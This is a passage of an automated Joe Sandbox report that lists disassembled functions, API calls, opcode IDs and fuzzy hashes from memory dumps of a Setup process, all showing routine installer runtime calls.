                                                              • Instruction Fuzzy Hash: BD110475E10229EFCF11DF96C90489EBB7AEF99708B144062F850A3614D3B4DA15DFD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch_free
                                                              • String ID:
                                                              • API String ID: 2207867443-0
                                                              • Opcode ID: 9151c22400c0620590251b8a75f6b5459ecccabee5b9bc773e9f403ace8473aa
                                                              • Instruction ID: 6fa08fc6424546df0f4fcac47ba46d74c2188835408d250d2ec31fc6f1c1e8be
                                                              • Opcode Fuzzy Hash: 9151c22400c0620590251b8a75f6b5459ecccabee5b9bc773e9f403ace8473aa
                                                              • Instruction Fuzzy Hash: 0B11AF70A05205EFEF00CBB4C5447ACB7B0BF25319F208559D429ABAC1C775DB58CAA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C943B32
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C944513: __CxxThrowException@8.LIBCMT ref: 6C9445A2
                                                                • Part of subcall function 6C918168: GetFileSize.KERNEL32(?,?,?,?,?,6C943B9F,?,?,00000000,?,?,?,?,00000008,6C94EC79,?), ref: 6C918178
                                                              • InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C94EC79,?,?), ref: 6C943BC9
                                                                • Part of subcall function 6C9180F7: WriteFile.KERNEL32(?,?,?,?,00000000,?,6C9460F1), ref: 6C91810D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FileH_prolog3$CriticalException@8InitializeSectionSizeThrowWrite
                                                              • String ID:
                                                              • API String ID: 593797809-0
                                                              • Opcode ID: c100caa9cb3c187bda9bfe6fbe815ecf3a0eae5f3032e5f0cabcdc513c55eda1
                                                              • Instruction ID: cb7950be594f73b74fc95005f4e64c8a78257b96df6f8390e1ee137521cc2fd9
                                                              • Opcode Fuzzy Hash: c100caa9cb3c187bda9bfe6fbe815ecf3a0eae5f3032e5f0cabcdc513c55eda1
                                                              • Instruction Fuzzy Hash: 3C1172B150124AEFDB10CFA4C945BDEBBB9BF25704F508406E554A7E41C770EA28CBE2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95131C
                                                                • Part of subcall function 6C9536BA: GetUserDefaultUILanguage.KERNEL32(02642228,?,00000000,?,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498), ref: 6C9536D8
                                                              • _free.LIBCMT ref: 6C95137B
                                                                • Part of subcall function 6C95374B: __EH_prolog3.LIBCMT ref: 6C953752
                                                                • Part of subcall function 6C95374B: PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,6C94FA6E,0000000C,6C953A05,?,6C90A794,?), ref: 6C9537B7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DefaultExistsFileLanguagePathUser_free
                                                              • String ID:
                                                              • API String ID: 2326855983-0
                                                              • Opcode ID: 3cd309043fbb4a4c78c5e061a246c8e156448f5cc9cee5f7ff11823de8a1a897
                                                              • Instruction ID: da7196e269061347ab4fcdf6fc432ba31e810d5fbe505ee689262aa9b624de48
                                                              • Opcode Fuzzy Hash: 3cd309043fbb4a4c78c5e061a246c8e156448f5cc9cee5f7ff11823de8a1a897
                                                              • Instruction Fuzzy Hash: 26115BB0C0222A9BCF11DFA4C8915EEBB78AF25704F904456D96077F41C734D526CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49F365
                                                              • __recalloc.LIBCMT ref: 6C49F3A7
                                                                • Part of subcall function 6C4A83ED: __CxxThrowException@8.LIBCMT ref: 6C4A83E2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw__recalloc
                                                              • String ID:
                                                              • API String ID: 2968967773-0
                                                              • Opcode ID: 80dd588798020f8ffef7fc35b13d3e42abcff462048db3475b94b691a88d0064
                                                              • Instruction ID: c6f9eae53930766fd2267f31311845ed522fa9587a57f84ab921191129168167
                                                              • Opcode Fuzzy Hash: 80dd588798020f8ffef7fc35b13d3e42abcff462048db3475b94b691a88d0064
                                                              • Instruction Fuzzy Hash: 680161311016518BE330CF69C484F5ABBE6EF9170DBA4491CE5A59BF44EB79E806C780
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memmove_s
                                                              • String ID:
                                                              • API String ID: 800865076-0
                                                              • Opcode ID: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
                                                              • Instruction ID: 2d91ab2c625d50a17138981422eaad61c98362726b142cf63db50b50de585af0
                                                              • Opcode Fuzzy Hash: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
                                                              • Instruction Fuzzy Hash: B101B5B1600004AFA70CDF6ACC65CAEB36DDFB6248714012EE50587B80EF71ED05C7A8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953AD3
                                                              • _memcpy_s.LIBCMT ref: 6C953B17
                                                                • Part of subcall function 6C968AFC: _wcsnlen.LIBCMT ref: 6C968B0C
                                                                • Part of subcall function 6C94FF21: _wcsnlen.LIBCMT ref: 6C94FF54
                                                                • Part of subcall function 6C94FF21: _memcpy_s.LIBCMT ref: 6C94FF8A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s_wcsnlen$H_prolog3
                                                              • String ID:
                                                              • API String ID: 301610209-0
                                                              • Opcode ID: 1d699263b0f9701af5502d64e69b90807ed0a8f4f329409171f9072ec2000a5d
                                                              • Instruction ID: 78c387da0a186257554c12cfe46f70db67b0f933d5653f0b2190f009d60c3aca
                                                              • Opcode Fuzzy Hash: 1d699263b0f9701af5502d64e69b90807ed0a8f4f329409171f9072ec2000a5d
                                                              • Instruction Fuzzy Hash: FD017C7111020A9FDB04DFA4C881EDE7369FF24304B448916E9019BB51DB35EE29CBB5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(00000000,00000034,00000000,00000001,00000000,00000000,00000034,?,?,6C92463B,00000034,00000034,00000000), ref: 6C9684A9
                                                              • RegCloseKey.ADVAPI32(?,?,?,6C92463B,00000034,00000034,00000000), ref: 6C9684BA
                                                                • Part of subcall function 6C968414: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,6C96849F,00000000,00000034,00000001,00000000,00000000,00000034,?,?,6C92463B,00000034,00000034,00000000), ref: 6C968425
                                                                • Part of subcall function 6C968414: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C968435
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseHandleModuleOpenProc
                                                              • String ID:
                                                              • API String ID: 823179699-0
                                                              • Opcode ID: 8cc90003c8128dbcf676de9480980ff97b700cd8d5998704e9b96568e0c9f30f
                                                              • Instruction ID: dd407ad7d9c39be027bc0c9e71b505393bdbe816493c92bfb7d6b61fa2e74394
                                                              • Opcode Fuzzy Hash: 8cc90003c8128dbcf676de9480980ff97b700cd8d5998704e9b96568e0c9f30f
                                                              • Instruction Fuzzy Hash: 78F06272101205FFEB198F45DC40F9AB77DFF41759F108126F9159A980C771DA10DB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetLastError.KERNEL32(0000000E,00000000), ref: 6C49DFD6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: d0c878f6074e453c76bd47a42a17e6c17adf3f074d1746f9c2c60b42a4bce0b3
                                                              • Instruction ID: c77b3cf94846d1fec601b8fb0fd0ef3fbbc63498edf48e435b1121b7b31f029e
                                                              • Opcode Fuzzy Hash: d0c878f6074e453c76bd47a42a17e6c17adf3f074d1746f9c2c60b42a4bce0b3
                                                              • Instruction Fuzzy Hash: 0CF0E9323443206FD710D669DC89F4677BCAB46729F444526F615FB981C7A0E801C294
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __recalloc
                                                              • String ID:
                                                              • API String ID: 492097735-0
                                                              • Opcode ID: 9fad07f04a2b3a0acf749a7f8c51c01a16ae848ac707a0ba0f52564536c0b0b1
                                                              • Instruction ID: 515d6b8226ac5c0e0380769a5d4facf8d292f452a6a8cc606a8116599ada7155
                                                              • Opcode Fuzzy Hash: 9fad07f04a2b3a0acf749a7f8c51c01a16ae848ac707a0ba0f52564536c0b0b1
                                                              • Instruction Fuzzy Hash: 91F05EB1640200AFEF019E65CCC0A65BBB8EF29254B04C060FE1CCE64AF631CD14D7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s
                                                              • String ID:
                                                              • API String ID: 2001391462-0
                                                              • Opcode ID: fe5dc39283643cf855e32fa90a050dbc95af31c6f7c3c4c905a391bb1e7ae606
                                                              • Instruction ID: 30644ac1653de990b0dc73db38a420d77cbd31589fdb4231dc1361ce3935a3d3
                                                              • Opcode Fuzzy Hash: fe5dc39283643cf855e32fa90a050dbc95af31c6f7c3c4c905a391bb1e7ae606
                                                              • Instruction Fuzzy Hash: 7AF03A72800158BB9F208F96CC48DCF7FBDEFA6254B154056FD04A7600E670EA45CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 6C95D747
                                                                • Part of subcall function 6C95FC46: __EH_prolog3.LIBCMT ref: 6C95FC4D
                                                                • Part of subcall function 6C95FC46: GetLastError.KERNEL32(?,?,?,6C95CE79,00000000,6C95BCC4,?,80070057,?,InvalidArguments,?,00000000,?,ParameterInfo.xml,?,?), ref: 6C95FC73
                                                              • PostMessageW.USER32(?,00000012,00000000,00000000), ref: 6C95D768
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CountErrorH_prolog3LastMessagePostTick
                                                              • String ID:
                                                              • API String ID: 1936365967-0
                                                              • Opcode ID: 1e2065bb8802716a6856e2960fc3d545d9ebecfe691535b724061060bc817443
                                                              • Instruction ID: e7373984a95f1f66b7a301413b9c9b3c150b72cd3bf34fb40b469eef32ae80a9
                                                              • Opcode Fuzzy Hash: 1e2065bb8802716a6856e2960fc3d545d9ebecfe691535b724061060bc817443
                                                              • Instruction Fuzzy Hash: 4AE092F76026467FDB048E6188C4C26B76CFB4426D7604139F51083E00C730DC60CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A6048
                                                              • GetCommandLineW.KERNEL32(0000001C,6C4930C2,?), ref: 6C4A604D
                                                                • Part of subcall function 6C48BE03: __EH_prolog3.LIBCMT ref: 6C48BE0A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandLine
                                                              • String ID:
                                                              • API String ID: 1384747822-0
                                                              • Opcode ID: eee7443b4d2656638a12a24b505f386ea077948c039e223956d8d6b066480dcd
                                                              • Instruction ID: bf8867666831ae7bcf1ac4788c5b9eb6fd164c31664fce3b2b5118b69c525fe8
                                                              • Opcode Fuzzy Hash: eee7443b4d2656638a12a24b505f386ea077948c039e223956d8d6b066480dcd
                                                              • Instruction Fuzzy Hash: AEF058729400098BCB04EBA8C844FEDB774AF2432CF080119E211BBAC0DB34998ACBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6C4911D8
                                                              • FlushFileBuffers.KERNEL32(?), ref: 6C4911EA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlushWrite
                                                              • String ID:
                                                              • API String ID: 1012034594-0
                                                              • Opcode ID: d88747a063ea1a44054baf23f18562f35e00cb218151e3e39fc08bf42f4ad777
                                                              • Instruction ID: 861498076292fcd32bf60f6a17c48060c189eecabe4300e3f80d06feed8bfbad
                                                              • Opcode Fuzzy Hash: d88747a063ea1a44054baf23f18562f35e00cb218151e3e39fc08bf42f4ad777
                                                              • Instruction Fuzzy Hash: 4CE06D36204256ABEB11DEA6CC05F8A3BBCAF0A755B04412AF924C1A14E730E9119A90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A29F6
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C48D923: __EH_prolog3.LIBCMT ref: 6C48D92A
                                                                • Part of subcall function 6C48D923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D960
                                                                • Part of subcall function 6C48D923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D9BA
                                                                • Part of subcall function 6C48D923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DA0D
                                                              • SysFreeString.OLEAUT32(00000000), ref: 6C4A2A33
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Path$CombineFileFreeModuleNameRelativeString
                                                              • String ID:
                                                              • API String ID: 2530041087-0
                                                              • Opcode ID: c0ef6a2a6ddb7f9f44dde937f697cd80f483c5c7c924b492fb18109f80268a02
                                                              • Instruction ID: 056b4e70b1ead2f35ea7a6e8e0f459ee956a35e6d43515f8f2ce90c3989335c6
                                                              • Opcode Fuzzy Hash: c0ef6a2a6ddb7f9f44dde937f697cd80f483c5c7c924b492fb18109f80268a02
                                                              • Instruction Fuzzy Hash: 83F01C7191121AABDF00DFA0CC08EEE7BB8FF14349F40841DF414B6650CB31CA199BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • UnloadUserProfile.USERENV(6C943AE6,6C90BF34,?,6C944ABC,6C90A590,10000000,6C90A590,80000000,6C90A590,10000000,6C90A5D8,6C90A54C), ref: 6C943AFB
                                                              • FindCloseChangeNotification.KERNEL32(6C943AE6,?,6C944ABC,6C90A590,10000000,6C90A590,80000000,6C90A590,10000000,6C90A5D8,6C90A54C), ref: 6C943B0D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotificationProfileUnloadUser
                                                              • String ID:
                                                              • API String ID: 122385185-0
                                                              • Opcode ID: 3ff8e67c2084ae2540ef194e1ca6198eb8b66dbf68df515637433619284ec369
                                                              • Instruction ID: b50ac95774e96825231d90ade7a9f8e3867cae9747e917e50dc60d98ccc9ef38
                                                              • Opcode Fuzzy Hash: 3ff8e67c2084ae2540ef194e1ca6198eb8b66dbf68df515637433619284ec369
                                                              • Instruction Fuzzy Hash: 6EE039712117019BEB348B22E849F2377ECAF4062AF20C81CA4BA83940DB74E800CA54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9595B3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • SysFreeString.OLEAUT32(?), ref: 6C9595E0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FreeString
                                                              • String ID:
                                                              • API String ID: 2872891630-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,6C9350F8,00000000,0000000C,6C936E7F,00000000,?), ref: 6C93517C
                                                              • LoadLibraryW.KERNEL32(?,?,?,6C9350F8,00000000,0000000C,6C936E7F,00000000,?), ref: 6C935194
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Library$FreeLoad
                                                              • String ID:
                                                              • API String ID: 534179979-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,6C952CF3), ref: 6C944035
